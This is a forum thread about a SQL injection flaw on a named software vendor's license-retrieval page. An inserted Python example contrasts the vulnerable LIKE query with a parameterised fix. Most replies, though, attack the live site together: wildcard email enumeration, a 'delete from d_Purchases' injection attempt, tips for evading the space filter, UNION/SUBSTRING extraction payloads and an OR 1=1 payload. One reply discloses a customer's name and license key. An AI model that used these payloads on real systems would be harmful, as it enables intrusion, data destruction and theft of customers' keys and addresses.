Easily hacked...


  • Considered Harmful

    http://fixtunes.com/purchasecode.php

    You can enter your email address on this form to retrieve the license you purchased. I thought, at first, it was a little insecure because you don't need any information besides an email address.

    As it turns out, you don't even need that. The text gets used in a SQL query using the LIKE operator, so a percent sign will work just as well!
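The query pattern this post describes, reproduced beside a hardened version, as an added example that is not code from the original thread or from the site being discussed. It uses SQLite in memory; the table and column names d_Purchases, Email and ItemId are the ones visible in the error output quoted later in the thread, while the rows, the 320-character bound (the figure a later reply gives for a maximum address) and all function names are constructed for the example.

```python
import re
import sqlite3

# Constructed rows standing in for the site's purchase table. The table and
# column names (d_Purchases, Email, ItemId) appear in the thread's quoted
# error output; the addresses and codes here are invented.
SAMPLE_ROWS = [
    ("alice@example.com", "AAAA-0000-A0"),
    ("bob@example.org", "BBBB-1111-B1"),
    ("carol@example.net", "CCCC-2222-C2"),
]

# Upper bound for an address as quoted in the thread (64 + 1 + 255).
MAX_EMAIL_LEN = 320

# Deliberately simple shape check: one local part, one @, a dotted domain.
# Note that % is a legal character in a local part, so stripping it is not
# the fix; binding the value as a parameter is.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def make_db():
    """Build an in-memory SQLite database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table d_Purchases (Email text, ItemId text)")
    conn.executemany("insert into d_Purchases values (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_input):
    """The pattern the thread describes: the form value is pasted into a LIKE
    clause, so SQL interprets % and _ as wildcards and ' as a delimiter."""
    sql = f"select ItemId from d_Purchases where Email like '{user_input}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, user_input):
    """Exact-match lookup with a bound parameter. A license lookup needs
    equality, not pattern matching, so LIKE has no business here at all."""
    if len(user_input) > MAX_EMAIL_LEN or not EMAIL_RE.match(user_input):
        return []
    rows = conn.execute(
        "select ItemId from d_Purchases where Email = ?", (user_input,)
    )
    return [row[0] for row in rows]


def escape_like(value, esc="\\"):
    """Neutralise LIKE metacharacters for the rare case where a pattern search
    over user input is genuinely wanted (e.g. all purchases under one domain)."""
    return (
        value.replace(esc, esc + esc)
        .replace("%", esc + "%")
        .replace("_", esc + "_")
    )


def lookup_by_domain(conn, domain):
    """Pattern search that still binds the pattern and escapes the user part,
    so a % or _ typed by the user matches only itself."""
    pattern = "%@" + escape_like(domain)
    rows = conn.execute(
        "select Email from d_Purchases where Email like ? escape '\\'",
        (pattern,),
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, input '%':", lookup_vulnerable(db, "%"))
    print("hardened,   input '%':", lookup_hardened(db, "%"))
    print("domain search, input '%':", lookup_by_domain(db, "%"))
```

Running the block shows the vulnerable lookup returning every row for a lone `%`, while the hardened lookup returns nothing for it and nothing for `a%@example.com` either, because a bound parameter compared with `=` is never interpreted as a pattern. Because the hardened version never builds SQL from the input, a quote character cannot produce a syntax error, and the generic "error" response the site later adopted should be backed by a server-side log rather than by echoing the failing query to the user.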



  • That's horrible.  I also don't like the idea that someone can pull up my product key just by knowing my email address.



  • I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 


  • Considered Harmful

    Presumably you could extract email addresses from this.

    Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.



  • @joe.edwards@imaginuity.com said:

    Presumably you could extract email addresses from this.

    Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.

     

    plz send codez



  • @skippy said:

    I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 

     

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.


  • Considered Harmful

    @medialint said:

    @skippy said:

    I also like that it limits the entry to 30 characters.  My email address is 28 chars, and it's not even that long of a company name on the end :/ 

     

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.

    I suppose the wildcards are there so you can work around the character length restriction.



  • Bad query:

  • Error #: 1064
  • Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
  • Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1

     

     They do seem to remove all spaces from your input.... Anyone know how to get around that?


  • Considered Harmful

    @MasterPlanSoftware said:

    Bad query:

  • Error #: 1064
  • Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
  • Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1

     


     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    Use a different kind of whitespace? Like a tab character.

    That said... Please don't delete their data. Somehow I doubt they're following proper backup procedures.



  • @joe.edwards@imaginuity.com said:

    Use a different kind of whitespace? Like a tab character.
     

    Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.



  • @MasterPlanSoftware said:

    @joe.edwards@imaginuity.com said:

    Use a different kind of whitespace? Like a tab character.
     

    Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.

     

    The tab character works, but it'll only run a single query. 


  • Considered Harmful

    abc' union select Email from d_Purchases where Email like 'a%


  • Interesting...

    Purchase Code: afes-sler-@c



  • Good to know that Mr. Fessler's code is AAA5-4E26-K9


  • Considered Harmful

    So I guess you can extract data in chunks with substring commands, knowing they're going to format any string like a license key.



  • @joe.edwards@imaginuity.com said:

    abc' union select Email from d_Purchases where Email like 'a%

     

    And then:

    abc'    union    select     SUBSTRING(Email    FROM    9)     from     d_Purchases     where     Email     like     'a%


  • Discourse touched me in a no-no place

    @MasterPlanSoftware said:

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    1. %20?
    2. Don't bother?
    3. Alt-0160?

    In a random order. I suggest #2.



  • @PJH said:

    @MasterPlanSoftware said:

     They do seem to remove all spaces from your input.... Anyone know how to get around that?

    1. %20?
    2. Don't bother?
    3. Alt-0160?

    In a random order. I suggest #2.

     

    Yeah, already solved. Thanks for your helpfulness...



  • @medialint said:

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
     

     

    I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database.  Some people's e-mail address is way too long.



  • @Heron said:

    @medialint said:

    Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
     

     

    I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database.  Some people's e-mail address is way too long.

    Is there any actual limit on email address lengths?



  • The part before the @ should be no longer than 64 characters while the domain name can be up to 255 characters, then add the @ and you have a maximum of 320 characters. However, the 64 character local-part limit isn't enforced and you can go longer.



  • So something like " OR 1=1 ORDER BY RAND(); -- would get you a random license? :D

    There's a similar hole on the LimeWire Pro site as well... :)



  • They appear to have fixed it. I now get "Error" when I put in %. 



  • @Jonathan Holland said:

    They appear to have fixed it. I now get "Error" when I put in %.
     

    Hurray for your efforts! 



  • It's not really fixed. If you enter anything other than an email address then it shows the nice helpful "error." screen.

